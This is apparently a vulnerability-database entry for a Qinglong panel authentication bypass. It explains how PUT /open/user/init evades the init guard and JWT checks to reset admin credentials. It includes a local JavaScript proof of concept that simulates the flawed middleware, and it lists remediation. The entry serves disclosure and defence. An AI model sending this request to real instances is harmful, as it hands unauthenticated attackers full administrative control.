A AegiFlow
CRITICALCVSS 9.3EPSS 0.4%

CVE-2026-55445

Qinglong has an incomplete fix for CVE-2026-3965: Improper Authentication

Published
2026-08-20
Modified
2026-08-20
EPSS percentile
34%
Aliases
GHSA-v667-gc2r-2xm7
Sources
github-advisory

Summary

### Summary The init guard middleware in Qinglong only checks `/api/user/init` paths but not `/open/user/init`, which is whitelisted from JWT authentication and rewritten to `/api/user/init` after the guard has already passed, allowing unauthenticated admin credential reset on initialized instances. ### Affected Package - **Ecosystem:** npm - **Package:** whyour/qinglong - **Affected versions:** = 6bec52dca158 ### Severity Medium ### CWE CWE-287 — Improper Authentication ### Details The Qinglong panel has an initialization endpoint (`/api/user/init`) that allows setting admin credentials. Once the system is initialized, an init guard middleware is supposed to block further calls. The middleware in `back/loaders/express.ts` only checks: ```javascript !['/api/user/init', '/api/user/notification/init'].includes(pathLower) ``` However, the application also has a URL rewrite rule: `rewrite('/open/*', '/api/$1')`. The `/open/*` paths are whitelisted from JWT authentication. The middleware ordering creates the bypass: first, JWT auth sees `/open/*` paths match the whitelist regex and skips authentication. Second, the init guard only checks for `/api/user/init` -- `/open/user/init` passes through as "not an init path". Third, the URL rewrite transforms `/open/user/init` to `/api/user/init` after the guard has already passed. This means an unauthenticated attacker can send `PUT /open/user/init` with new credentials to reset the admin account on any Qinglong panel instance, gaining full administrative access. ### PoC ```javascript /** * CVE-2026-3965 - Qinglong Panel /open/user/init Auth Bypass * * The init guard middleware only checks /api/user/init paths. * But /open/user/init is whitelisted from JWT auth and rewritten * to /api/user/init via express-urlrewrite AFTER the guard. */ "use strict"; // Simulate the init guard middleware exactly as in the source function initGuardMiddleware(reqPath, authInfo) { const pathLower = reqPath.toLowerCase(); // Exact check from the vulnerable source if (!['/api/user/init', '/api/user/notification/init'].includes(pathLower)) { return { action: "next" }; // passes through } let isInitialized = true; if ( Object.keys(authInfo).length === 2 && authInfo.username === 'admin' && authInfo.password === 'admin' ) { isInitialized = false; } if (isInitialized) { return { action: "block", code: 450, message: "Error" }; } else { return { action: "next" }; } } const authInfo = { username: "realAdmin", password: "str0ngP@ss!" }; console.log("System state: initialized (non-default credentials)"); // Test 1: Direct /api/user/init is blocked const test1 = initGuardMiddleware("/api/user/init", authInfo); console.log("\n[Test 1] PUT /api/user/init:"); console.log(" Guard result:", test1.action); console.log(" Blocked:", test1.action === "block"); // Test 2: /open/user/init BYPASSES init guard const test2 = initGuardMiddleware("/open/user/init", authInfo); console.log("\n[Test 2] PUT /open/user/init:"); console.log(" Guard result:", test2.action); console.log(" Bypassed guard:", test2.action === "next"); if (test2.action === "next") { const rewrittenPath = "/open/user/init".replace(/^\/open\//, "/api/"); console.log(" After rewrite:", rewrittenPath); console.log(" Reaches init handler: true"); } if (test1.action === "block" && test2.action === "next") { console.log("\nVULNERABILITY CONFIRMED: /open/user/init bypasses the init guard"); console.log("An attacker can reset admin credentials on an initialized instance."); process.exit(0); } else { console.log("\nVULNERABILITY NOT CONFIRMED"); process.exit(1); } ``` **Steps to reproduce:** 1. `git clone https://github.com/whyour/qinglong /tmp/qinglong_test` 2. `cd /tmp/qinglong_test && git checkout 6bec52dc~1` 3. `node poc.js` **Expected output:** ``` VULNERABILITY CONFIRMED /open/user/init bypasses the init guard; the guard only che

Affected packages

EcosystemPackageAffected versionsFixed versions
npm@whyour/qinglong2.20.1

Remediation: Upgrade to 2.20.1 or later.

References

Includes data from the GitHub Advisory Database, licensed under CC-BY 4.0.

CVE® is a registered trademark of The MITRE Corporation. CVE content reproduced under the CVE Terms of Use; copyright designation © MITRE.

EPSS scores provided by the FIRST.org Exploit Prediction Scoring System.